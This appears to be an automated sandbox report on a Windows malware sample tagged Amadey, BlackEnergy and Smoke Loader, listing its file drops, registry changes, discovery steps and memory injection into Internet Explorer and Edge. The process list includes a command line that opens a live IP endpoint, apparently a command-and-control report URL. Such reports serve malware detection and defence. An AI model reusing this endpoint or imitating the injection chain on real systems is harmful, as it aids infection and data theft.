File created C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.22000.318_none_2bc95a47eaa37094\hvax64.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-a..roblemstepsrecorder_31bf3856ad364e35_10.0.22000.1_none_3b89d92484239859\psr.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-advancedtaskmanager_31bf3856ad364e35_10.0.22000.65_none_9b4fcb543bd21a13\r\Taskmgr.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-rpc-ping_31bf3856ad364e35_10.0.22000.1_none_fe52560879e25943\RpcPing.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..cecontroller-minwin_31bf3856ad364e35_10.0.22000.51_none_2158495b1874d95c\f\services.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-advancedtaskmanager_31bf3856ad364e35_10.0.22000.65_none_9b4fcb543bd21a13\f\Taskmgr.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-onecore-pnp-drvinst_31bf3856ad364e35_10.0.22000.1_none_aba17b366eb3e321\drvinst.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-a..t-bytecodegenerator_31bf3856ad364e35_10.0.22000.71_none_c26272ecb066f6ab\ByteCodeGenerator.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-b..ment-windows-minwin_31bf3856ad364e35_10.0.22000.318_none_4b63ad41811cb76d\f\winload.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-d..-commandline-dsdiag_31bf3856ad364e35_10.0.22000.434_none_478d6c55833b17ab\dcdiag.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-narrator_31bf3856ad364e35_10.0.22000.100_none_b998a9a728d6401f\f\Narrator.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-pickerhost_31bf3856ad364e35_10.0.22000.1_none_03f10908532480fe\PickerHost.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..tiondialog.appxmain_31bf3856ad364e35_10.0.22000.120_none_0f681b8c9b834caa\f\PinningConfirmationDialog.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-p..auncher-cmdlinetool_31bf3856ad364e35_10.0.22000.1_none_4d8388bf67ce9090\pwlauncher.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-p..tiondialog.appxmain_31bf3856ad364e35_10.0.22000.120_none_0f681b8c9b834caa\PinningConfirmationDialog.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\msil_addinprocess_b77a5c561934e089_10.0.22000.1_none_f1c351dedf09f213\AddInProcess.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-wmi-core-svc_31bf3856ad364e35_10.0.22000.1_none_014b03c8301af3f9\WinMgmt.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5f6e7d4cbd14f8f7\f\SearchIndexer.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SystemApps\microsoft.creddialoghost_cw5n1h2txyewy\CredDialogHost.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-deviceenroller_31bf3856ad364e35_10.0.22000.469_none_bc884b259290e3bf\r\DeviceEnroller.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.22000.120_none_dd24c7cd1fc6d4b1\PeopleExperienceHost.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_windows-securityhealth-sso_31bf3856ad364e35_10.0.22000.100_none_bac6834bfb16b20d\r\SecurityHealthSystray.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\sdchange.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-atbroker_31bf3856ad364e35_10.0.22000.1_none_25e44d77231e4b64\AtBroker.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-d..-commandline-dsmgmt_31bf3856ad364e35_10.0.22000.434_none_4634d5a384238dfd\r\dsmgmt.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\x86_microsoft-windows-ie-feedsbs_31bf3856ad364e35_11.0.22000.1_none_2a646c04920783d6\msfeedssync.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMSvcHost\v4.0_4.0.0.0__b03f5f7f11d50a3a\SMSvcHost.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-d..ice-daf-pospayments_31bf3856ad364e35_10.0.22000.1_none_abd5b42ed12df708\pospaymentsworker.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-s..native-whitebox-isv_31bf3856ad364e35_10.0.22000.120_none_e4b70edd74d735f3\f\RMActivate_isv.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "1" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "13" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "0" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh = "268435456" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListDomainAttributeSet = "0" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "8" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\GPU\SubSysId = "0" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\GPU\Revision = "0" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "395196024" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "9" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "0" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateLowDateTime = "1853774386" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "268435456" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\HomepagesUpgradeVersion = "1" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPMigrationVer = "1" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow = "395196024" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\GPU\SoftwareFallback = "0" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\GPU\VendorId = "4318" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\GPU\DeviceId = "140" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "0" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateHighDateTime = "31190320" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133961046444521985" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1418876453-2228697459-2788511057-1000\{485D920B-9929-4D58-BCA8-339A43C5A821} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3064 wrote to memory of 1184 N/A C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe C:\Program Files\Internet Explorer\IEXPLORE.exe
PID 3064 wrote to memory of 1184 N/A C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe C:\Program Files\Internet Explorer\IEXPLORE.exe
PID 1184 wrote to memory of 5292 N/A C:\Program Files\Internet Explorer\IEXPLORE.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1184 wrote to memory of 5292 N/A C:\Program Files\Internet Explorer\IEXPLORE.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 5444 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 5444 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 5136 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 5136 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 5000 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 5000 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 5000 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 5000 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 5000 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe

"C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe"

C:\Program Files\Internet Explorer\IEXPLORE.exe

"C:\Program Files\Internet Explorer\IEXPLORE" 212.33.237.86/images/1/report.php

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -- "http://212.33.237.86/images/1/report.php"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

